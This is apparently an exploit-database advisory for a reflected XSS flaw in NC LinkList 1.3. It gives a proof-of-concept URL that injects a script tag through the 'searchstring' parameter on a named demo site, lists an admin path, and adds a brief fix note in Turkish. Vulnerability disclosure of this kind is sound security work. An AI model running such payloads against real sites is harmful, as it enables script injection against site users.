[#] Exploit Title: NC LinkList Version 1.3 ~ XSS Vulnerability

[#] Author: Err0r

[#] Date: 01.08.2011

[#] E-mail: [email protected]

[#] Category: Web App.

[#] Note : Warning.

[#] DEMO:http://www.php-linkverzeichnis.de/demo/index.php?action=show&view=search

[#] Price : ab 49,00

[#] Vuln Type: Reflected XSS

[!] Fix : GET \\ ile searchstring Degiskenine atanan deger veya text Filtreden geçirildikten sonra ekrana yazilmali / aktarilmali . .

##################

[*] Exploit :

# alert(document.domain)http://www.php-linkverzeichnis.de/demo/index.php?action=show&view=search&searchstring=><script>alert(document.domain)</script>

# http://php-linkverzeichnis.de/demo/admin/

#########################